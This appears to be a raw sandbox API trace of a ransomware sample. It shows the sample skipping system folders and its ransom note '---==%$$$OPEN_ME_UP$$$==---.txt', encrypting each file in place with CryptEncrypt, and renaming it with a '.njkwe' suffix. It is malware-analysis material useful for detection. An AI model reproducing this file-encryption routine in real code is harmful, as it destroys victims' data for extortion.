[0062.305] lstrcmpiW (lpString1="netfx_Core.mzz", lpString2="Program Files") returned -1 [0062.305] lstrcmpiW (lpString1="netfx_Core.mzz", lpString2="Program Files (x86)") returned -1 [0062.305] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core.mzz") returned 40 [0062.305] StrStrIW (lpFirst="netfx_Core.mzz", lpSrch=".njkwe") returned 0x0 [0062.305] lstrcmpW (lpString1="netfx_Core.mzz", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0062.305] lstrcmpW (lpString1="netfx_Core.mzz", lpString2="taridd") returned -1 [0062.305] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core.mzz", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0062.305] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core.mzz" (normalized: "c:\\588bce7c90097ed212\\netfx_core.mzz"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0062.305] GetTickCount () returned 0x114fffc [0062.305] GetTickCount () returned 0x114fffc [0062.306] GetTickCount () returned 0x114fffc [0062.306] GetTickCount () returned 0x114fffc [0062.306] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0062.306] GetProcessHeap () returned 0xbe0000 [0062.306] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0062.306] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0062.312] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0062.312] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0062.313] GetProcessHeap () returned 0xbe0000 [0062.313] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0062.313] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0062.313] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0062.315] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0062.315] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0062.315] CloseHandle (hObject=0x428) returned 1 [0062.980] GetProcessHeap () returned 0xbe0000 [0062.980] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0062.980] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core.mzz_r00t_{3sXlE5}.njkwe") returned 60 [0062.980] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core.mzz" (normalized: "c:\\588bce7c90097ed212\\netfx_core.mzz"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core.mzz_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\netfx_core.mzz_r00t_{3sxle5}.njkwe")) returned 1 [0062.980] GetProcessHeap () returned 0xbe0000 [0062.981] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0062.981] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xc183da00, ftCreationTime.dwHighDateTime=0x1cac6e3, ftLastAccessTime.dwLowDateTime=0xc183da00, ftLastAccessTime.dwHighDateTime=0x1cac6e3, ftLastWriteTime.dwLowDateTime=0xc183da00, ftLastWriteTime.dwHighDateTime=0x1cac6e3, nFileSizeHigh=0x0, nFileSizeLow=0x1d0200, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="netfx_Core_x64.msi", cAlternateFileName="NETFX_~1.MSI")) returned 1 [0062.981] lstrcmpiW (lpString1="netfx_Core_x64.msi", lpString2="Windows") returned -1 [0062.981] lstrcmpiW (lpString1="netfx_Core_x64.msi", lpString2="$Recycle.bin") returned 1 [0062.981] lstrcmpiW (lpString1="netfx_Core_x64.msi", lpString2="System Volume Information") returned -1 [0062.981] lstrcmpiW (lpString1="netfx_Core_x64.msi", lpString2="Program Files") returned -1 [0062.981] lstrcmpiW (lpString1="netfx_Core_x64.msi", lpString2="Program Files (x86)") returned -1 [0062.981] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x64.msi") returned 44 [0062.981] StrStrIW (lpFirst="netfx_Core_x64.msi", lpSrch=".njkwe") returned 0x0 [0062.981] lstrcmpW (lpString1="netfx_Core_x64.msi", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0062.981] lstrcmpW (lpString1="netfx_Core_x64.msi", lpString2="taridd") returned -1 [0062.981] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x64.msi", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0062.981] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x64.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0062.982] GetTickCount () returned 0x115029c [0062.982] GetTickCount () returned 0x115029c [0062.982] GetTickCount () returned 0x115029c [0062.982] GetTickCount () returned 0x115029c [0062.982] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0062.982] GetProcessHeap () returned 0xbe0000 [0062.982] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0062.982] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0062.984] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0062.984] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0062.984] GetProcessHeap () returned 0xbe0000 [0062.984] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0062.984] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0062.985] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0062.986] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0062.986] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0062.986] CloseHandle (hObject=0x428) returned 1 [0063.057] GetProcessHeap () returned 0xbe0000 [0063.057] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0063.057] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x64.msi_r00t_{3sXlE5}.njkwe") returned 64 [0063.057] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x64.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x64.msi"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x64.msi_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x64.msi_r00t_{3sxle5}.njkwe")) returned 1 [0063.058] GetProcessHeap () returned 0xbe0000 [0063.058] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0063.058] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x4c130c00, ftCreationTime.dwHighDateTime=0x1cac6d9, ftLastAccessTime.dwLowDateTime=0x4c130c00, ftLastAccessTime.dwHighDateTime=0x1cac6d9, ftLastWriteTime.dwLowDateTime=0x4c130c00, ftLastWriteTime.dwHighDateTime=0x1cac6d9, nFileSizeHigh=0x0, nFileSizeLow=0x11c000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="netfx_Core_x86.msi", cAlternateFileName="NETFX_~2.MSI")) returned 1 [0063.058] lstrcmpiW (lpString1="netfx_Core_x86.msi", lpString2="Windows") returned -1 [0063.058] lstrcmpiW (lpString1="netfx_Core_x86.msi", lpString2="$Recycle.bin") returned 1 [0063.058] lstrcmpiW (lpString1="netfx_Core_x86.msi", lpString2="System Volume Information") returned -1 [0063.058] lstrcmpiW (lpString1="netfx_Core_x86.msi", lpString2="Program Files") returned -1 [0063.058] lstrcmpiW (lpString1="netfx_Core_x86.msi", lpString2="Program Files (x86)") returned -1 [0063.058] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x86.msi") returned 44 [0063.058] StrStrIW (lpFirst="netfx_Core_x86.msi", lpSrch=".njkwe") returned 0x0 [0063.058] lstrcmpW (lpString1="netfx_Core_x86.msi", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0063.058] lstrcmpW (lpString1="netfx_Core_x86.msi", lpString2="taridd") returned -1 [0063.058] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x86.msi", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0063.058] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0063.059] GetTickCount () returned 0x11502ea [0063.059] GetTickCount () returned 0x11502ea [0063.059] GetTickCount () returned 0x11502ea [0063.059] GetTickCount () returned 0x11502ea [0063.059] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0063.059] GetProcessHeap () returned 0xbe0000 [0063.059] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0063.059] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0063.062] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0063.062] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0063.062] GetProcessHeap () returned 0xbe0000 [0063.062] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0063.062] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0063.062] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0063.064] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0063.064] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0063.064] CloseHandle (hObject=0x428) returned 1 [0063.105] GetProcessHeap () returned 0xbe0000 [0063.105] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0063.105] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x86.msi_r00t_{3sXlE5}.njkwe") returned 64 [0063.105] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x86.msi"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x86.msi_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x86.msi_r00t_{3sxle5}.njkwe")) returned 1 [0063.106] GetProcessHeap () returned 0xbe0000 [0063.106] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0063.106] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf74cd515, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf74cd515, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf7cd9415, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x29222c7, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="netfx_Extended.mzz", cAlternateFileName="NETFX_~2.MZZ")) returned 1 [0063.106] lstrcmpiW (lpString1="netfx_Extended.mzz", lpString2="Windows") returned -1 [0063.106] lstrcmpiW (lpString1="netfx_Extended.mzz", lpString2="$Recycle.bin") returned 1 [0063.106] lstrcmpiW (lpString1="netfx_Extended.mzz", lpString2="System Volume Information") returned -1 [0063.106] lstrcmpiW (lpString1="netfx_Extended.mzz", lpString2="Program Files") returned -1 [0063.106] lstrcmpiW (lpString1="netfx_Extended.mzz", lpString2="Program Files (x86)") returned -1 [0063.106] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended.mzz") returned 44 [0063.106] StrStrIW (lpFirst="netfx_Extended.mzz", lpSrch=".njkwe") returned 0x0 [0063.106] lstrcmpW (lpString1="netfx_Extended.mzz", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0063.107] lstrcmpW (lpString1="netfx_Extended.mzz", lpString2="taridd") returned -1 [0063.107] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended.mzz", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0063.107] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended.mzz" (normalized: "c:\\588bce7c90097ed212\\netfx_extended.mzz"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0063.107] GetTickCount () returned 0x1150319 [0063.107] GetTickCount () returned 0x1150319 [0063.107] GetTickCount () returned 0x1150319 [0063.107] GetTickCount () returned 0x1150319 [0063.107] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0063.107] GetProcessHeap () returned 0xbe0000 [0063.107] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0063.107] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0063.110] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0063.110] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0063.110] GetProcessHeap () returned 0xbe0000 [0063.110] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0063.110] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0063.110] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0063.305] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0063.305] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0063.305] CloseHandle (hObject=0x428) returned 1 [0064.016] GetProcessHeap () returned 0xbe0000 [0064.016] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0064.016] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended.mzz_r00t_{3sXlE5}.njkwe") returned 64 [0064.016] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended.mzz" (normalized: "c:\\588bce7c90097ed212\\netfx_extended.mzz"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended.mzz_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\netfx_extended.mzz_r00t_{3sxle5}.njkwe")) returned 1 [0064.017] GetProcessHeap () returned 0xbe0000 [0064.017] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0064.017] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2dbe0800, ftCreationTime.dwHighDateTime=0x1cac6fb, ftLastAccessTime.dwLowDateTime=0x2dbe0800, ftLastAccessTime.dwHighDateTime=0x1cac6fb, ftLastWriteTime.dwLowDateTime=0x2dbe0800, ftLastWriteTime.dwHighDateTime=0x1cac6fb, nFileSizeHigh=0x0, nFileSizeLow=0xd5000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="netfx_Extended_x64.msi", cAlternateFileName="NETFX_~3.MSI")) returned 1 [0064.017] lstrcmpiW (lpString1="netfx_Extended_x64.msi", lpString2="Windows") returned -1 [0064.017] lstrcmpiW (lpString1="netfx_Extended_x64.msi", lpString2="$Recycle.bin") returned 1 [0064.017] lstrcmpiW (lpString1="netfx_Extended_x64.msi", lpString2="System Volume Information") returned -1 [0064.017] lstrcmpiW (lpString1="netfx_Extended_x64.msi", lpString2="Program Files") returned -1 [0064.017] lstrcmpiW (lpString1="netfx_Extended_x64.msi", lpString2="Program Files (x86)") returned -1 [0064.017] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x64.msi") returned 48 [0064.017] StrStrIW (lpFirst="netfx_Extended_x64.msi", lpSrch=".njkwe") returned 0x0 [0064.017] lstrcmpW (lpString1="netfx_Extended_x64.msi", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0064.017] lstrcmpW (lpString1="netfx_Extended_x64.msi", lpString2="taridd") returned -1 [0064.017] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x64.msi", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0064.017] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x64.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0064.018] GetTickCount () returned 0x11506a3 [0064.018] GetTickCount () returned 0x11506a3 [0064.018] GetTickCount () returned 0x11506a3 [0064.018] GetTickCount () returned 0x11506a3 [0064.018] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0064.018] GetProcessHeap () returned 0xbe0000 [0064.018] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0064.018] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0064.020] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0064.020] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0064.020] GetProcessHeap () returned 0xbe0000 [0064.020] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0064.020] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.020] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0064.021] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0064.021] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0064.021] CloseHandle (hObject=0x428) returned 1 [0064.041] GetProcessHeap () returned 0xbe0000 [0064.041] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0064.041] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x64.msi_r00t_{3sXlE5}.njkwe") returned 68 [0064.041] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x64.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x64.msi"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x64.msi_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x64.msi_r00t_{3sxle5}.njkwe")) returned 1 [0064.042] GetProcessHeap () returned 0xbe0000 [0064.042] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0064.042] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x7626f700, ftCreationTime.dwHighDateTime=0x1cac6f6, ftLastAccessTime.dwLowDateTime=0x7626f700, ftLastAccessTime.dwHighDateTime=0x1cac6f6, 